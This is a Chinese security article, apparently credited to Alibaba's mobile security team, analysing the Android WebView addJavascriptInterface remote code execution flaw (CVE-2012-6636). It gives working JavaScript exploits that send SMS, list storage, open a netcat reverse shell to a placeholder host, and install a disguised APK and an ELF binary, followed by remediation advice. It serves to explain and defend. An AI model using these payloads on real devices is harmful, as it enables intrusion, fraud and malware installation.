溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析

發(fā)布時(shí)間:2020-09-04 11:02:56 來(lái)源:腳本之家 閱讀:114 作者:阿里無(wú)線安全團(tuán)隊(duì) 欄目:移動(dòng)開(kāi)發(fā)

1. WebView 遠(yuǎn)程代碼執(zhí)行漏洞描述

      Android API level 16以及之前的版本存在遠(yuǎn)程代碼執(zhí)行安全漏洞,該漏洞源于程序沒(méi)有正確限制使用WebView.addJavascriptInterface方法,遠(yuǎn)程攻擊者可通過(guò)使用Java Reflection API利用該漏洞執(zhí)行任意Java對(duì)象的方法,簡(jiǎn)單的說(shuō)就是通過(guò)addJavascriptInterface給WebView加入一個(gè)JavaScript橋接接口,JavaScript通過(guò)調(diào)用這個(gè)接口可以直接操作本地的JAVA接口。該漏洞最早公布于CVE-2012-6636【1】,其描述了WebView中addJavascriptInterface API導(dǎo)致的遠(yuǎn)程代碼執(zhí)行安全漏洞。

      該漏洞公布的近期,多款A(yù)ndroid流行應(yīng)用曾被曝出高危掛馬漏洞:點(diǎn)擊消息或朋友社區(qū)圈中的一條網(wǎng)址時(shí),用戶手機(jī)然后就會(huì)自動(dòng)執(zhí)行被掛馬的代碼指令,從而導(dǎo)致被安裝惡意扣費(fèi)軟件、向好友發(fā)送欺詐短信、通訊錄和短信被竊取以及被遠(yuǎn)程控制等嚴(yán)重后果。在烏云漏洞平臺(tái)上,包括Android版的微信、QQ、騰訊微博、QQ瀏覽器、快播、百度瀏覽器、金山瀏覽器等大批TOP應(yīng)用均被曝光同類型的漏洞。

      論文Attacks on WebView in the Android System【2】中指出可以利用所導(dǎo)出的讀寫文件接口來(lái)進(jìn)行文件的讀寫操作,攻擊者可以通過(guò)中間人攻擊篡改Webview所顯示的頁(yè)面來(lái)達(dá)到對(duì)手機(jī)文件系統(tǒng)的控制。

2. WebView 遠(yuǎn)程代碼執(zhí)行影響范圍

      Android API level 小于17 (即Android 4.2之前的系統(tǒng)版本)

3.WebView 遠(yuǎn)程代碼執(zhí)行漏洞詳情

1) WebView 遠(yuǎn)程代碼執(zhí)行漏洞位置:

      WebView.addJavascriptInterface(Object obj, String interfaceName)

2)WebView 遠(yuǎn)程代碼執(zhí)行漏洞觸發(fā)前提條件:

      使用addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的Java對(duì)象;

      使用WebView加載外部網(wǎng)頁(yè)或者本地網(wǎng)頁(yè);

      Android系統(tǒng)版本低于4.2;

3) WebView 遠(yuǎn)程代碼執(zhí)行漏洞原理:

      Android系統(tǒng)通過(guò)WebView.addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的Java對(duì)象,以用于增強(qiáng)JavaScript的功能。但是系統(tǒng)并沒(méi)有對(duì)注冊(cè)Java類的方法調(diào)用的限制。導(dǎo)致攻擊者可以利用反射機(jī)制調(diào)用未注冊(cè)的其它任何Java類,最終導(dǎo)致JavaScript能力的無(wú)限增強(qiáng)。攻擊者利用該漏洞可以根據(jù)客戶端能力為所欲為。

4. WebView 遠(yuǎn)程代碼執(zhí)行漏洞POC

      1) 利用addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的java對(duì)象 “injectedObj”,利用反射機(jī)制調(diào)用Android API sendTextMessage來(lái)發(fā)送短信。

      java代碼:

mWebView = new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(this, "injectedObj");
mWebView.loadUrl(file:///android_asset/www/index.html);

      EXP的JavaScript代碼:

<html>
 <body>
 <script>
  var objSmsManager = injectedObj.getClass().forName("android.telephony.SmsManager").getM ethod("getDefault",null).invoke(null,null);
  objSmsManager.sendTextMessage("10086",null,"this message is sent by JS when webview is loading",null,null);
 </script>
 </body>
</html>

      2) 利用addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的java對(duì)象 “injectedObj”,利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令:

      EXP的JavaScript代碼:

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }

  var res = execute(["/system/bin/sh", "-c", "ls -al /mnt/sdcard/"]);
  document.write(getContents(res.getInputStream()));
 </script>
 </body>
</html>

      利用后的執(zhí)行結(jié)果:

關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析

      3) 利用addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的java對(duì)象 “injectedObj”,利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令,達(dá)到反彈一個(gè)手機(jī)端的shell到遠(yuǎn)程控制端的目的:

      EXP的JavaScript代碼:

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }
  execute(["/system/bin/sh","-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/system/bin/sh -i 2>&1|nc x.x.x.x 9099 >/tmp/f"]);
 </script>
 </body>
</html>

      執(zhí)行后的結(jié)果:

 關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析

      4) 利用addJavascriptInterface方法注冊(cè)可供JavaScript調(diào)用的java對(duì)象 “injectedObj”,利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令進(jìn)行掛馬:a安裝木馬應(yīng)用APK, b 安裝執(zhí)行ELF可執(zhí)行程序;

      簡(jiǎn)單的安裝發(fā)送短信木馬APK,EXP的JavaScript代碼:

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }
  var apk = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x62 \\xB9\\x15\\x30\\x3D\\x07\\x01\\x00\\x00\\x7C\\x01\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xD6\\x0D\\x00\\x00\\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x53------------------------------------------------------------ \\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x52\\x53\\x41\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x07\\x00\\x07\\x00\\xBA\\x01\\x00\\x00\\xB6\\x11\\x00\\x00\\x00\\x00"
  execute(["/system/bin/sh","-c","echo '"+apk+"' > /data/data/com.example.hellojs/fake.png"]);
  execute(["chmod","755","/data/data/com.example.hellojs/fake.png"]);
  execute(["su","-c","pm install -r /data/data/com.example.hellojs/fake.png"]);
 </script>
 </body>
</html>

      由下圖可得知我們已經(jīng)拼接成了一個(gè)APK程序,并偽裝成一張png圖片:

關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析 

      由下圖可知,我們已經(jīng)成功安裝fake.png APK程序:

關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析 

      例如網(wǎng)上流行的Androrat遠(yuǎn)程控制程序,攻擊者利用上述漏洞即可簡(jiǎn)單的安裝此遠(yuǎn)程控制木馬應(yīng)用APK即可達(dá)到遠(yuǎn)程控制用戶手機(jī)的目的。   

      利用漏洞拼接可執(zhí)行ELF程序,并執(zhí)行該ELF程序達(dá)到為所欲為的目的,博文Abusing WebView JavaScript Bridges

【3】還實(shí)現(xiàn)了在非root情況下利用ELF可執(zhí)行程序偷取sdcard的文件的POC,由此可見(jiàn),該漏洞的危害性極大:

     EXP的JavaScript代碼:

<html>
 <body>
  <script>
   function execute(cmdArgs)
   {
    return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
   }
   var bin = "\\x7F\\x45\\x4C\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\xE4\\x83\\x00\\x00\\x34\\x00\\x00\\x00\\x58\\x21\\x00\\x00\\x00\\x00\\x00\\x05\\x34\\x00\\x20\\x00\\x08\\x00\\x28\\x00\\x18\\x00\\x17\\x00\\x06\\x00\\x00\\x00\\x34\\x00\\x00\\x00\\x34\\x80\\x00\\x00\\x34\\x80\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x34\\x01\\x00\\x00\\x34\\x81\\x00\\x00\\x34\\x81\\x00\\x00\\x13--------------------------------------------------------------------------------------------------------------------------------\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x00\\x03\\x00\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x20\\x00\\x00\\x2D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x71\\x20\\x00\\x00\\xE4\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00";
   execute(["/system/bin/sh","-c","echo '" + bin + "' > /data/data/com.example.hellojs/testBin"]);
   execute(["chmod","755","/data/data/com.example.hellojs/testBin"]);
   var res = execute(["/data/data/com.example.hellojs/testBin"]);
   document.write(getContents(res.getInputStream()));
  </script>
 </body>
</html>

      “testBin”文件已拼接生成,如下圖所示:

關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析

      執(zhí)行之后的結(jié)果如下:

 關(guān)于Android中WebView遠(yuǎn)程代碼執(zhí)行漏洞淺析

5. WebView遠(yuǎn)程代碼執(zhí)行漏洞修復(fù)建議

1. API Level等于或高于17的Android系統(tǒng)【4】

      出于安全考慮,為了防止Java層的函數(shù)被隨便調(diào)用,Google在4.2版本之后,規(guī)定允許被調(diào)用的函數(shù)必須以@JavascriptInterface進(jìn)行注解,所以如果某應(yīng)用依賴的API Level為17或者以上,就不會(huì)受該問(wèn)題的影響(注:Android 4.2中API Level小于17的應(yīng)用也會(huì)受影響)。按照Google官方文檔[5]使用示例:

class JsObject {
 @JavascriptInterface
 public String toString() { return "injectedObject"; }
}
webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");

2. API Level等于或高于17的Android系統(tǒng)

      建議不要使用addJavascriptInterface接口,以免帶來(lái)不必要的安全隱患,請(qǐng)參照博文《在Webview中如何讓JS與Java安全地互相調(diào)用》[6]。

      如果一定要使用addJavascriptInterface接口:

      1) 如果使用HTTPS協(xié)議加載URL,應(yīng)進(jìn)行證書校驗(yàn)防止訪問(wèn)的頁(yè)面被篡改掛馬;

      2) 如果使用HTTP協(xié)議加載URL,應(yīng)進(jìn)行白名單過(guò)濾、完整性校驗(yàn)等防止訪問(wèn)的頁(yè)面被篡改;

      3) 如果加載本地Html,應(yīng)將html文件內(nèi)置在APK中,以及進(jìn)行對(duì)html頁(yè)面完整性的校驗(yàn);

3. 移除Android系統(tǒng)內(nèi)部的默認(rèn)內(nèi)置接口

      同時(shí),在2014年發(fā)現(xiàn)在Android系統(tǒng)中webkit中默認(rèn)內(nèi)置的一個(gè)searchBoxJavaBridge_ 接口同時(shí)存在遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞公布于CVE-2014-1939[7], 建議開(kāi)發(fā)者通過(guò)以下方式移除該Javascript接口:    

 removeJavascriptInterface("searchBoxJavaBridge_")

      2014年香港理工大學(xué)的研究人員Daoyuan Wu和Rocky Chang發(fā)現(xiàn)了兩個(gè)新的攻擊向量存在于android/webkit/AccessibilityInjector.java中,分別是"accessibility" 和"accessibilityTraversal" ,調(diào)用了此組件的應(yīng)用在開(kāi)啟輔助功能選項(xiàng)中第三方服務(wù)的安卓系統(tǒng)中會(huì)造成遠(yuǎn)程代碼執(zhí)行漏洞。該漏洞公布于CVE-2014-7224, 此漏洞原理與searchBoxJavaBridge_接口遠(yuǎn)程代碼執(zhí)行相似,均為未移除不安全的默認(rèn)接口,建議開(kāi)發(fā)者通過(guò)以下方式移除該JavaScript接口:

removeJavascriptInterface("accessibility");
 removeJavascriptInterface("accessibilityTraversal");

參考文章

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6636

[2] Attacks on WebView in the Android System

[3] http://50.56.33.56/blog/?p=314

[4] Google Official Android API Level Reference

[5] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)

[6] 在Webview中如何讓JS與Java安全地互相調(diào)用

[7] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1939

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)億速云的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI